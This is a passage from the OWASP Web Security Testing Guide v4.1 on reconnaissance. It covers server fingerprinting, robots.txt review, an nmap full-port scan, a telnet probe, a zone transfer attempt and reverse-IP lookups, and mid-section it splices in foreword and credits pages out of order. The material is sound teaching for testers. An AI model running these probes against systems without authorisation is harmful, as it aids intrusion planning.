One way to compel a server to present these is by sending intentionally incorrect</p><p>or malformed requests.</p><p>For example, here is the response to a request for the non-existent method SANTA CLAUS from an Apache server.</p><p>Web Security Testing Guide v4.1</p><p>52</p><p>GET / SANTA CLAUS/1.1</p><p>HTTP/1.1 400 Bad Request</p><p>Date: Fri, 06 Sep 2019 19:21:01 GMT</p><p>Server: Apache/2.4.41 (Unix)</p><p>Content-Length: 226</p><p>Connection: close</p><p>Content-Type: text/html; charset=iso-8859-1</p><p><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"></p><p><html><head></p><p><title>400 Bad Request</title></p><p></head><body></p><p><h1>Bad Request</h1></p><p><p>Your browser sent a request that this server could not understand.<br /></p><p></p></p><p></body></html></p><p>Here is the response to the same request from nginx.</p><p>GET / SANTA CLAUS/1.1</p><p><html></p><p><head><title>404 Not Found</title></head></p><p><body></p><p><center><h1>404 Not Found</h1></center></p><p><hr><center>nginx/1.17.3</center></p><p></body></p><p></html></p><p>Here is the response to the same request from lighttpd.</p><p>GET / SANTA CLAUS/1.1</p><p>HTTP/1.0 400 Bad Request</p><p>Content-Type: text/html</p><p>Content-Length: 345</p><p>Connection: close</p><p>Date: Sun, 08 Sep 2019 21:56:17 GMT</p><p>Server: lighttpd/1.4.54</p><p><?xml version="1.0" encoding="iso-8859-1"?></p><p><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"</p><p>"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"></p><p><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"></p><p><head></p><p><title>400 Bad Request</title></p><p></head></p><p><body></p><p><h1>400 Bad Request</h1></p><p></body></p><p></html></p><p>As default error pages offer many differentiating factors between types of web servers, their examination can be an</p><p>effective method for fingerprinting even when server header fields are obscured.</p><p>Using Automated Scanning Tools</p><p>Web Security Testing 
Guide v4.1</p><p>53</p><p>As stated earlier, web server fingerprinting is often included as a functionality of automated scanning tools. These tools</p><p>are able to make requests similar to those demonstrated above, as well as send other more server-specific probes.</p><p>Automated tools can compare responses from web servers much faster than manual testing, and utilize large</p><p>databases of known responses to attempt server identification. For these reasons, automated tools are more likely to</p><p>produce accurate results.</p><p>Here are some commonly-used scan tools that include web server fingerprinting functionality.</p><p>Netcraft, an online tool that scans websites for information, including the web server.</p><p>Nikto, an open source command line scanning tool.</p><p>Nmap, an open source command line tool that also has a GUI, Zenmap.</p><p>Remediation</p><p>While exposed server information is not necessarily in itself a vulnerability, it is information that can assist attackers in</p><p>exploiting other vulnerabilities that may exist. Exposed server information can also lead attackers to find version-</p><p>specific server vulnerabilities that can be used to exploit unpatched servers. For this reason it is recommended that</p><p>some precautions be taken. 
These actions include:</p><p>Obscuring web server information in headers, such as with Apache’s mod_headers module.</p><p>Using a hardened reverse proxy server to create an additional layer of security between the web server and the</p><p>Internet.</p><p>Ensuring that web servers are kept up-to-date with the latest software and security patches.</p><p>https://toolbar.netcraft.com/site_report</p><p>https://github.com/sullo/nikto</p><p>https://nmap.org/</p><p>https://nmap.org/zenmap/</p><p>https://httpd.apache.org/docs/current/mod/mod_headers.html</p><p>https://en.wikipedia.org/wiki/Proxy_server#Reverse_proxies</p><p>Web Security Testing Guide v4.1</p><p>54</p><p>Review Webserver Metafiles for Information Leakage</p><p>ID</p><p>WSTG-INFO-03</p><p>Summary</p><p>This section describes how to test the robots.txt file for information leakage of the web application’s directory or folder</p><p>path(s). Furthermore, the list of directories that are to be avoided by Spiders, Robots, or Crawlers can also be created</p><p>as a dependency for Map execution paths through application</p><p>Test Objectives</p><p>1. Information leakage of the web application’s directory or folder path(s).</p><p>2. Create the list of directories that are to be avoided by Spiders, Robots, or Crawlers.</p><p>How to Test</p><p>robots.txt</p><p>Web Spiders, Robots, or Crawlers retrieve a web page and then recursively traverse hyperlinks to retrieve further web</p><p>content. Their accepted behavior is specified by the Robots Exclusion Protocol of the robots.txt file in the web root</p><p>directory.</p><p>As an example, the beginning of the robots.txt file from https://www.google.com/robots.txt sampled on 11 August 2013 is</p><p>quoted below:</p><p>User-agent: *</p><p>Disallow: /search</p><p>Disallow: /sdch</p><p>Disallow: /groups</p><p>Disallow: /images</p><p>Disallow: /catalogs</p><p>...</p><p>The User-Agent directive refers to the specific web spider/robot/crawler. 
For example, the User-Agent: Googlebot refers</p><p>to the spider from Google, while “User-Agent: bingbot” refers to the crawler from Microsoft/Yahoo!. User-Agent: * in the</p><p>example above applies to all web spiders/robots/crawlers, as quoted below:</p><p>User-agent: *</p><p>The Disallow directive specifies which resources are prohibited by spiders/robots/crawlers. In the example above,</p><p>directories such as the following are prohibited:</p><p>...</p><p>Disallow: /search</p><p>Disallow: /sdch</p><p>Disallow: /groups</p><p>Disallow: /images</p><p>Disallow: /catalogs</p><p>...</p><p>Web spiders/robots/crawlers can intentionally ignore the Disallow directives specified in a robots.txt file, such as</p><p>those from social networks, to ensure that shared links are still valid. Hence, robots.txt should not be considered as a</p><p>https://www.robotstxt.org/</p><p>https://www.robotstxt.org/</p><p>https://www.google.com/robots.txt</p><p>https://support.google.com/webmasters/answer/6062608?visit_id=637173940975499736-3548411022&rd=1</p><p>https://blog.isc2.org/isc2_blog/2008/07/the-attack-of-t.html</p><p>https://www.htbridge.com/news/social_networks_can_robots_violate_user_privacy.html</p><p>Web Security Testing Guide v4.1</p><p>55</p><p>mechanism to enforce restrictions on how web content is accessed, stored, or republished by third parties.</p><p>robots.txt in Webroot - with `Wget` or `Curl`</p><p>The robots.txt file is retrieved from the web root directory of the web server. For example, to retrieve the robots.txt from</p><p>www.google.com using wget or curl :</p><p>$ wget http://www.google.com/robots.txt</p><p>--2013-08-11 14:40:36-- http://www.google.com/robots.txt</p><p>Resolving www.google.com... 74.125.237.17, 74.125.237.18, 74.125.237.19, ...</p><p>Connecting to www.google.com|74.125.237.17|:80... connected.</p><p>HTTP request sent, awaiting response... 
200 OK</p><p>Length: unspecified [text/plain]</p><p>Saving to: ‘robots.txt.1’</p><p>[ <=> ] 7,074 --.-K/s in 0s</p><p>2013-08-11 14:40:37 (59.7 MB/s) - ‘robots.txt’ saved [7074]</p><p>$ head -n5 robots.txt</p><p>User-agent: *</p><p>Disallow: /search</p><p>Disallow: /sdch</p><p>Disallow: /groups</p><p>Disallow: /images</p><p>$</p><p>$ curl -O http://www.google.com/robots.txt</p><p>% Total % Received % Xferd Average Speed Time Time Time Current</p><p>Dload Upload Total Spent Left Speed</p><p>101 7074 0 7074 0 0 9410 0 --:--:-- --:--:-- --:--:-- 27312</p><p>$ head</p><p>-n5 robots.txt</p><p>User-agent: *</p><p>Disallow: /search</p><p>Disallow: /sdch</p><p>Disallow: /groups</p><p>Disallow: /images</p><p>$</p><p>robots.txt in Webroot - with Rockspider</p><p>rockspider automates the creation of the initial scope for Spiders/Robots/Crawlers of files and directories/folders of a</p><p>web site.</p><p>For example, to create the initial scope based on the Allowed : directive from www.google.com using rockspider:</p><p>$ ./rockspider.pl -www www.google.com</p><p>"Rockspider" Alpha v0.1_2</p><p>Copyright 2013 Christian Heinrich</p><p>Licensed under the Apache License, Version 2.0</p><p>1. Downloading http://www.google.com/robots.txt</p><p>2. "robots.txt" saved as "www.google.com-robots.txt"</p><p>3. Sending Allow: URIs of www.google.com to web proxy i.e. 127.0.0.1:8080</p><p>/catalogs/about sent</p><p>/catalogs/p? sent</p><p>/news/directory sent</p><p>...</p><p>4. Done.</p><p>$</p><p>https://github.com/cmlh/rockspider/</p><p>https://www.smh.com.au/technology/telstra-customer-database-exposed-20111209-1on60.html</p><p>Web Security Testing Guide v4.1</p><p>56</p><p>Analyze robots.txt Using Google Webmaster Tools</p><p>Web site owners can use the Google “Analyze robots.txt” function to analyse the website as part of its Google</p><p>Webmaster Tools. This tool can assist with testing and the procedure is as follows:</p><p>1. 
Sign into Google Webmaster Tools with a Google account.</p><p>2. On the dashboard, write the URL for the site to be analyzed.</p><p>3. Choose between the available methods and follow the on screen instruction.</p><p>META Tag</p><p><META> tags are located within the HEAD section of each HTML Document and should be consistent across a web site</p><p>in the likely event that the robot/spider/crawler start point does not begin from a document link other than webroot i.e. a</p><p>deep link.</p><p>If there is no <META NAME="ROBOTS" ... > entry then the “Robots Exclusion Protocol” defaults to INDEX,FOLLOW</p><p>respectively. Therefore, the other two valid entries defined by the “Robots Exclusion Protocol” are prefixed with NO...</p><p>i.e. NOINDEX and NOFOLLOW .</p><p>Web spiders/robots/crawlers can intentionally ignore the <META NAME="ROBOTS" tag as the robots.txt file convention is</p><p>preferred. Hence, Tags should not be considered the primary mechanism, rather a complementary control to</p><p>robots.txt.</p><p>META Tags - with Burp</p><p>Based on the Disallow directive(s) listed within the robots.txt file in webroot, a regular expression search for <META</p><p>NAME="ROBOTS" within each web page is undertaken and the result compared to the robots.txt file in webroot.</p><p>For example, the robots.txt file from facebook.com has a Disallow: /ac.php entry http://facebook.com/robots.txt and</p><p>the resulting search for <META NAME="ROBOTS" shown below:</p><p>Figure 4.1.3-1: Facebook Meta Tag Example</p><p>The above might be considered a fail since INDEX,FOLLOW is the default <META> Tag specified by the “Robots</p><p>Exclusion Protocol” yet Disallow: /ac.php is listed in robots.txt.</p><p>Tools</p><p>Browser (View Source function)</p><p>https://www.google.com/webmasters/tools</p><p>https://en.wikipedia.org/wiki/Deep_linking</p><p>http://facebook.com/robots.txt</p><p>Web Security Testing Guide 
v4.1</p><p>57</p><p>curl</p><p>wget</p><p>rockspider</p><p>https://github.com/cmlh/rockspider</p><p>Web Security Testing Guide v4.1</p><p>58</p><p>Enumerate Applications on Webserver</p><p>ID</p><p>WSTG-INFO-04</p><p>Summary</p><p>A paramount step in testing for web application vulnerabilities is to find out which particular applications are hosted on</p><p>a web server. Many applications have known vulnerabilities and known attack strategies that can be exploited in order</p><p>to gain remote control or to exploit data. In addition, many applications are often misconfigured or not updated, due to</p><p>the perception that they are only used “internally” and therefore no threat exists. With the proliferation of virtual web</p><p>servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original</p><p>significance. It is not uncommon to have multiple web sites or applications whose symbolic names resolve to the same</p><p>IP address. This scenario is not limited to hosting environments, but applies to ordinary corporate environments as</p><p>well.</p><p>Security professionals are sometimes given a set of IP addresses as a target to test. It is arguable that this scenario is</p><p>more akin to a penetration test-type engagement, but in any case it is expected that such an assignment would test all</p><p>web applications accessible through this target. The problem is that the given IP address may host an HTTP service on port</p><p>80, but if a tester accesses it by specifying the IP address (which is all they know) it reports “No web server</p><p>configured at this address” or a similar message. But that system could “hide” a number of web applications, associated</p><p>with unrelated symbolic (DNS) names. Obviously, the extent of the analysis is deeply affected by whether the tester tests all</p><p>applications or only tests the applications that they are aware of.</p><p>Sometimes, the target specification is richer. 
The tester may be given a list of IP addresses and their corresponding</p><p>symbolic names. Nevertheless, this list might convey partial information, i.e., it could omit some symbolic names, and</p><p>the client may not even be aware of that (this is more likely to happen in large organizations).</p><p>Other issues affecting the scope of the assessment are represented by web applications published at non-obvious</p><p>URLs (e.g., http://www.example.com/some-strange-URL ), which are not referenced elsewhere. This may happen</p><p>either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).</p><p>To address these issues, it is necessary to perform web application discovery.</p><p>Test Objectives</p><p>Enumerate the applications within scope that exist on a web server.</p><p>How to Test</p><p>Black-Box Testing</p><p>Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is</p><p>usually specified as a set of IP addresses (maybe a net block), but may consist of a set of DNS symbolic names or a mix</p><p>of the two. This information is handed out prior to the execution of an assessment, be it a classic-style penetration test</p><p>or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., test only</p><p>the application located at the URL http://www.example.com/ ), the assessment should strive to be the most</p><p>comprehensive in scope, i.e. it should identify all the applications accessible through the given target. The following</p><p>examples examine a few techniques that can be employed to achieve this goal.</p><p>Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based</p><p>search services and the use of search engines. 
Examples make use of private IP addresses (such as</p><p>192.168.1.100 ), which, unless indicated otherwise, represent generic IP addresses and are used only for</p><p>anonymity purposes.</p><p>Web Security Testing Guide v4.1</p><p>59</p><p>There are three factors influencing how many applications are related to a given DNS name (or an IP address):</p><p>1. Different Base URL</p><p>The obvious entry point for a web application is www.example.com , i.e., with this shorthand notation we think of the</p><p>web application originating at http://www.example.com/ (the same applies for https). However, even though this</p><p>is the most common situation, there is nothing forcing the application to start at / .</p><p>For example, the same symbolic name may be associated to three web applications such as:</p><p>http://www.example.com/url1 http://www.example.com/url2 http://www.example.com/url3</p><p>In this case, the URL http://www.example.com/ would not be associated with a meaningful page, and the three</p><p>applications would be hidden, unless the tester explicitly knows how to reach them, i.e., the tester knows url1, url2</p><p>or url3. There is usually no need to publish web applications in this way, unless the owner doesn’t want them to be</p><p>accessible in a standard way, and is prepared to inform the users about their exact location. This doesn’t mean that</p><p>these applications are secret, just that their existence and location is not explicitly advertised.</p><p>2. Non-standard</p><p>and maintaining secure applications. This Testing Guide will show</p><p>you how to verify the security of your running application. I highly recommend using these guides as part of your</p><p>application security initiatives.</p><p>Why OWASP?</p><p>Creating a guide like this is a huge undertaking, requiring the expertise of hundreds of people around the world. 
There are many different ways to test for security flaws, and this guide captures the consensus of the leading experts on how to perform this testing quickly, accurately, and efficiently. OWASP gives like-minded security folks the ability to work together and form a leading practice approach to a security problem.</p><p>Having this guide available in a completely free and open way is important for the foundation’s mission. It gives anyone the ability to understand the techniques used to test for common security issues. Security should not be a black art or closed secret that only a few can practice. It should be open to all, and not exclusive to security practitioners but also QA, developers, and technical managers. The project to build this guide keeps this expertise in the hands of the people who need it - you, me, and anyone that is involved in building software.</p><p>This guide must make its way into the hands of developers and software testers. There are not nearly enough application security experts in the world to make any significant dent in the overall problem. The initial responsibility for application security must fall on the shoulders of the developers: they write the code. It shouldn’t be a surprise that developers aren’t producing secure code if they’re not testing for it, or considering the types of bugs which introduce vulnerabilities.</p><p>Keeping this information up to date is a critical aspect of this guide project. By adopting the wiki approach, the OWASP community can evolve and expand the information in this guide to keep pace with the fast-moving application security threat landscape.</p><p>This Guide is a great testament to the passion and energy our members and project volunteers have for this subject. 
It shall certainly help change the world a line of code at a time.</p><p>https://www.zaproxy.org/</p><p>Tailoring and Prioritizing</p><p>You should adopt this guide in your organization. You may need to tailor the information to match your organization’s technologies, processes, and organizational structure.</p><p>In general, there are several different roles within organizations that may use this guide:</p><p>Developers should use this guide to ensure that they are producing secure code. These tests should be a part of normal code and unit testing procedures.</p><p>Software testers and QA should use this guide to expand the set of test cases they apply to applications. Catching these vulnerabilities early saves considerable time and effort later.</p><p>Security specialists should use this guide in combination with other techniques, as one way to verify that no security holes have been missed in an application.</p><p>Project Managers should consider the reason this guide exists: security issues manifest themselves via bugs in code and design.</p><p>The most important thing to remember when performing security testing is to continuously re-prioritize. There are an infinite number of possible ways that an application could fail, and organizations always have limited testing time and resources. Be sure time and resources are spent wisely. Try to focus on the security holes that are a real risk to your business. Try to contextualize risk in terms of the application and its use cases.</p><p>This guide is best viewed as a set of techniques that you can use to find different types of security holes. But not all the techniques are equally important. 
Try to avoid using the guide as a checklist; new vulnerabilities are always manifesting, and no guide can be an exhaustive list of “things to test for”. Rather, this is a great place to start.</p><p>The Role of Automated Tools</p><p>There are a number of companies selling automated security analysis and testing tools. Remember the limitations of these tools so that you can use them for what they’re good at. As Michael Howard put it at the 2006 OWASP AppSec Conference in Seattle, “Tools do not make software secure! They help scale the process and help enforce policy.”</p><p>Most importantly, these tools are generic - meaning that they are not designed for your custom code, but for applications in general. That means that while they can find some generic problems, they do not have enough knowledge of your application to allow them to detect most flaws. In my experience, the most serious security issues are the ones that are not generic, but deeply intertwined in your business logic and custom application design.</p><p>These tools can also be seductive, since they do find lots of potential issues. While running the tools doesn’t take much time, each one of the potential problems takes time to investigate and verify. If the goal is to find and eliminate the most serious flaws as quickly as possible, consider whether your time is best spent with automated tools or with the techniques described in this guide. Still, these tools are certainly part of a well-balanced application security program. Used wisely, they can support your overall processes to produce more secure code.</p><p>Call to Action</p><p>If you’re building, designing or testing software, I strongly encourage you to get familiar with the security testing guidance in this document. It is a great road map for testing the most common issues facing applications today, but it is not exhaustive. 
If you find errors, please add a note to the discussion page or make the change yourself. You’ll be helping thousands of others who use this guide.</p><p>Please consider joining us as an individual or corporate member so that we can continue to produce materials like this testing guide and all the other great projects at OWASP.</p><p>Thank you to all the past and future contributors to this guide; your work will help to make applications worldwide more secure.</p><p>–Eoin Keary, OWASP Board Member, April 19, 2013</p><p>https://owasp.org/membership/</p><p>Frontispiece</p><p>Welcome</p><p>Open and collaborative knowledge: that is the OWASP way.</p><p>With v4 we realized a new guide that will be the de facto standard guide for performing Web Application Penetration Testing.</p><p>— Matteo Meucci</p><p>OWASP thanks the many authors, reviewers, and editors for their hard work in bringing this guide to where it is today. If you have any comments or suggestions on the Testing Guide, please feel free to open an Issue or submit a fix/contribution via Pull Request to our GitHub repo.</p><p>Version 4.1</p><p>This minor release represents a transitional step between the 2014 release of v4 via the OWASP wiki, and the preparation of v5, currently underway on GitHub.</p><p>Copyright and License</p><p>Copyright (c) 2020 The OWASP Foundation.</p><p>This document is released under the Creative Commons Attribution-ShareAlike 4.0 License. 
Please read and understand the license and copyright conditions.</p><p>Leaders</p><p>Elie Saad</p><p>Matteo Meucci</p><p>Rick Mitchell</p><p>Core Team</p><p>Rejah Rehim</p><p>Victoria Drake</p><p>Authors</p><p>Elie Saad</p><p>Janos Zold</p><p>Jeremy Bonghwan Choi</p><p>Joel Espunya</p><p>Manh Pham Tien</p><p>Mark Clayton</p><p>Rick Mitchell</p><p>Rubal Jain</p><p>Tal Argoni</p><p>Victoria Drake</p><p>Graphic Designers</p><p>Hugo Costa</p><p>https://github.com/OWASP/wstg/</p><p>https://creativecommons.org/licenses/by-sa/4.0/</p><p>Jishnu Vijayan C K</p><p>Muhammed Anees</p><p>Reviewers or Editors</p><p>Asharaf Ali</p><p>Elie Saad</p><p>Jeremy Bonghwan Choi</p><p>Lukasz Lubczynski</p><p>Patrick Santos</p><p>Rejah Rehim</p><p>Rick Mitchell</p><p>Roman Mueller</p><p>Tom Bowyer</p><p>Victoria Drake</p><p>Trademarks</p><p>Java, Java Web Server, and JSP are registered trademarks of Sun Microsystems, Inc.</p><p>Merriam-Webster is a trademark of Merriam-Webster, Inc.</p><p>Microsoft is a registered trademark of Microsoft Corporation.</p><p>Octave is a service mark of Carnegie Mellon University.</p><p>OWASP is a registered trademark of the OWASP Foundation.</p><p>VeriSign and Thawte are registered trademarks of VeriSign, Inc.</p><p>Visa is a registered trademark of VISA USA.</p><p>All other products</p><p>2. Non-standard Ports</p><p>While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/ . For example, http://www.example.com:20000/ .</p><p>3. Virtual Hosts</p><p>DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address 192.168.1.100 might be associated with DNS names www.example.com , helpdesk.example.com , webmail.example.com . 
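This one-to-many mapping can be explored from the client side: since the virtual host served depends on the Host header of the request, sending the same request with different candidate names and comparing the responses may reveal additional applications. A minimal sketch using only the Python standard library (the IP address and host names below are illustrative placeholders):

```python
# Sketch: probe one IP with several candidate Host headers to see whether
# the server returns different content for different virtual hosts.
import http.client

def fetch_with_host(ip, host, port=80, timeout=5):
    """Request / from `ip`, presenting `host` in the HTTP/1.1 Host header.
    Returns (status, body_length) so responses can be compared."""
    conn = http.client.HTTPConnection(ip, port, timeout=timeout)
    try:
        conn.request("GET", "/", headers={"Host": host})
        resp = conn.getresponse()
        body = resp.read()
        return resp.status, len(body)
    finally:
        conn.close()

# Example (hypothetical target):
#   for name in ("www.example.com", "helpdesk.example.com", "webmail.example.com"):
#       print(name, fetch_with_host("192.168.1.100", name))
```

Responses that differ in status code or body size across candidate names suggest distinct virtual hosts behind the same address.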
It is not necessary that all the names belong to the same DNS domain. This 1-to-N relationship may be exploited to serve different content by using so-called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 Host header.</p><p>One would not suspect the existence of other web applications in addition to the obvious www.example.com , unless they know of helpdesk.example.com and webmail.example.com .</p><p>Approaches to Address Issue 1 - Non-standard URLs</p><p>There is no way to fully ascertain the existence of non-standard-named web applications. Being non-standard, there are no fixed criteria governing the naming convention; however, there are a number of techniques that the tester can use to gain some additional insight.</p><p>First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect.</p><p>Second, these applications may be referenced by other web pages, and there is a chance that they have been spidered and indexed by web search engines. If testers suspect the existence of such hidden applications on www.example.com , they could search using the site operator and examine the result of a query for site:www.example.com . Among the returned URLs there could be one pointing to such a non-obvious application.</p><p>Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from URLs such as https://www.example.com/webmail , https://webmail.example.com/ , or https://mail.example.com/ . 
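Such probing can be scripted. The sketch below, using only the Python standard library, issues HEAD requests for a few candidate paths and reports anything that does not return 404; the wordlist is a small illustrative assumption (real tests use much larger lists, and some servers answer 200 for unknown paths, so results still need manual review):

```python
# Sketch: dictionary-style probing for unadvertised applications.
# CANDIDATES is a small illustrative wordlist, not a standard one.
import http.client

CANDIDATES = ["/webmail", "/admin", "/manager/html", "/phpmyadmin"]

def probe(host, paths, port=443, use_tls=True, timeout=5):
    """Issue a HEAD request for each candidate path; collect any status
    other than 404, which may indicate a hidden application."""
    found = {}
    for path in paths:
        cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
        conn = cls(host, port, timeout=timeout)
        try:
            conn.request("HEAD", path)
            status = conn.getresponse().status
        except OSError:
            continue  # connection problem: skip this candidate
        finally:
            conn.close()
        if status != 404:
            found[path] = status
    return found

# Example (hypothetical target): probe("www.example.com", CANDIDATES)
```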
The same holds for administrative interfaces, which may be published at hidden URLs (for example, a Tomcat administrative interface), and yet not referenced anywhere. So doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.</p><p>Approaches to Address Issue 2 - Non-standard Ports</p><p>https://tools.ietf.org/html/rfc2616#section-14.23</p><p>It is easy to check for the existence of web applications on non-standard ports. A port scanner such as nmap is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.</p><p>For example, the following command will look up, with a TCP connect scan, all open ports on IP 192.168.1.100 and will try to determine what services are bound to them (only essential switches are shown - nmap features a broad set of options, whose discussion is out of scope):</p><p>nmap -PN -sT -sV -p0-65535 192.168.1.100</p><p>It is sufficient to examine the output and look for http or the indication of SSL-wrapped services (which should be probed to confirm that they are https). 
For example, the output of the previous command could look like:</p><p>Interesting ports on 192.168.1.100:</p><p>(The 65527 ports scanned but not shown below are in state: closed)</p><p>PORT STATE SERVICE VERSION</p><p>22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99)</p><p>80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))</p><p>443/tcp open ssl OpenSSL</p><p>901/tcp open http Samba SWAT administration server</p><p>1241/tcp open ssl Nessus security scanner</p><p>3690/tcp open unknown</p><p>8000/tcp open http-alt?</p><p>8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1</p><p>From this example, one can see that:</p><p>There is an Apache HTTP server running on port 80.</p><p>It looks like there is an HTTPS server on port 443 (but this needs to be confirmed, for example, by visiting https://192.168.1.100 with a browser).</p><p>On port 901 there is a Samba SWAT web interface.</p><p>The service on port 1241 is not HTTPS, but is the SSL-wrapped Nessus daemon.</p><p>Port 3690 features an unspecified service (nmap gives back its fingerprint - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents).</p><p>There is another unspecified service on port 8000; this might possibly be HTTP, since it is not uncommon to find HTTP servers on this port. Let’s examine this issue:</p><p>$ telnet 192.168.1.100 8000</p><p>Trying 192.168.1.100...</p><p>Connected to 192.168.1.100.</p><p>Escape character is '^]'.</p><p>GET / HTTP/1.0</p><p>HTTP/1.0 200 OK</p><p>pragma: no-cache</p><p>Content-Type: text/html</p><p>Server: MX4J-HTTPD/1.0</p><p>expires: now</p><p>Cache-Control: no-cache</p><p><html></p><p>...</p><p>This confirms that it is in fact an HTTP server. 
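The manual telnet check above can also be scripted. A minimal sketch using only the Python standard library, assuming only that an HTTP service answers a bare HTTP/1.0 request with an HTTP status line:

```python
# Sketch: connect to a port, send a bare HTTP/1.0 request, and see
# whether an HTTP status line comes back.
import socket

def looks_like_http(host, port, timeout=5):
    """Return True if the service on host:port answers with an HTTP status line."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.0\r\nHost: %b\r\n\r\n" % (host.encode(),))
            banner = s.recv(1024)
    except OSError:
        return False
    return banner.startswith(b"HTTP/")

# Example (hypothetical target): looks_like_http("192.168.1.100", 8000)
```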
Alternatively, testers could have visited the URL with a web browser, or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (however, HEAD requests may not be honored by all servers).</p><p>Apache Tomcat is running on port 8080.</p><p>The same task may be performed by vulnerability scanners, but first check that the scanner of choice is able to identify HTTP[S] services running on non-standard ports. For example, Nessus is capable of identifying them on arbitrary ports (provided it is instructed to scan all the ports), and will provide, compared to nmap, a number of tests on known web server vulnerabilities, as well as on the SSL configuration of HTTPS services. As hinted before, Nessus is also able to spot popular applications or web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).</p><p>Approaches to Address Issue 3 - Virtual Hosts</p><p>There are a number of techniques which may be used to identify DNS names associated with a given IP address x.y.z.t .</p><p>DNS Zone Transfers</p><p>This technique has limited use nowadays, given the fact that zone transfers are largely not honored by DNS servers. However, it may be worth a try. First of all, testers must determine the name servers serving x.y.z.t . If a symbolic name is known for x.y.z.t (let it be www.example.com ), its name servers can be determined by means of tools such as nslookup , host , or dig , by requesting DNS NS records.</p><p>If no symbolic names are known for x.y.z.t , but the target definition contains at least a symbolic name, testers may try to apply the same process and query the name server of that name (hoping that x.y.z.t will be served as well by that name server). 
For example, if the target consists of the IP address x.y.z.t and the name mail.example.com , determine the name servers for domain example.com .</p><p>The following example shows how to identify the name servers for www.owasp.org by using the host command:</p><p>$ host -t ns www.owasp.org</p><p>www.owasp.org is an alias for owasp.org.</p><p>owasp.org name server ns1.secure.net.</p><p>owasp.org name server ns2.secure.net.</p><p>A zone transfer may now be requested from the name servers for domain example.com . If the tester is lucky, they will get back a list of the DNS entries for this domain. This will include the obvious www.example.com and the not-so-obvious helpdesk.example.com and webmail.example.com (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated.</p><p>Trying to request a zone transfer for owasp.org from one of its name servers:</p><p>$ host -l www.owasp.org ns1.secure.net</p><p>Using domain server:</p><p>Name: ns1.secure.net</p><p>Address: 192.220.124.10#53</p><p>Aliases:</p><p>Host www.owasp.org not found: 5(REFUSED)</p><p>; Transfer failed.</p><p>DNS Inverse Queries</p><p>This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If the testers are lucky, they may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name maps, which is not guaranteed.</p><p>Web-based DNS Searches</p><p>This kind of search is akin to a DNS zone transfer, but relies on web-based services that enable name-based searches on DNS. One such service is the Netcraft Search DNS service. The tester may query for a list of names belonging to your domain of choice, such as example.com . 
Then they will check whether the names they obtained are pertinent to the target they are examining.</p><p>Reverse-IP Services</p><p>Reverse-IP services are similar to DNS inverse queries, with the difference that the testers query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.</p><p>Domain Tools Reverse IP (requires free membership)</p><p>Bing, syntax: ip:x.x.x.x</p><p>Webhosting Info, syntax: http://whois.webhosting.info/x.x.x.x</p><p>DNSstuff (multiple services available)</p><p>Net Square (multiple queries on domains and IP addresses, requires installation)</p><p>The following example shows the result of a query to one of the above reverse-IP services for 216.48.3.18 , the IP address of www.owasp.org. Three additional non-obvious symbolic names mapping to the same address have been revealed.</p><p>Figure 4.1.4-1: OWASP Whois Info</p><p>Googling</p><p>Following information gathering with the previous techniques, testers can rely on search engines to possibly refine and extend their analysis. This may yield evidence of additional symbolic names belonging to the target, or applications accessible via non-obvious URLs.</p><p>For instance, considering the previous example regarding www.owasp.org , the tester could query Google and other search engines looking for information (hence, DNS names) related to the newly discovered domains of webgoat.org , webscarab.com , and webscarab.net .</p><p>Googling techniques are explained in Testing: Spiders, Robots, and Crawlers.</p><p>Gray-Box Testing</p><p>Not applicable. 
The methodology remains the same as listed in black-box testing, no matter how much information the tester starts with.</p><p>Tools</p><p>https://searchdns.netcraft.com/?host</p><p>https://www.domaintools.com/reverse-ip/</p><p>https://bing.com/</p><p>http://whois.webhosting.info/</p><p>https://www.dnsstuff.com/</p><p>https://web.archive.org/web/20190515092354/http://www.net-square.com/mspawn.html</p><p>http://www.owasp.org/</p><p>DNS lookup tools such as nslookup , dig and similar.</p><p>Search engines (Google, Bing and other major search engines).</p><p>Specialized DNS-related web-based search service: see text.</p><p>Nmap</p><p>Nessus Vulnerability Scanner</p><p>Nikto</p><p>https://nmap.org/</p><p>https://www.tenable.com/products/nessus</p><p>https://www.cirt.net/nikto2</p><p>Review Webpage Comments and Metadata for Information Leakage</p><p>ID</p><p>WSTG-INFO-05</p><p>Summary</p><p>It is very common, and even recommended, for programmers to include detailed comments and metadata in their source code. However, comments and metadata included in the HTML code might reveal internal information that should not be available to potential attackers. Comments and metadata should be reviewed in order to determine if any information is being leaked.</p><p>Test Objectives</p><p>Review webpage comments and metadata to better understand the application and to find any information leakage.</p><p>How to Test</p><p>HTML comments are often used by developers to include debugging 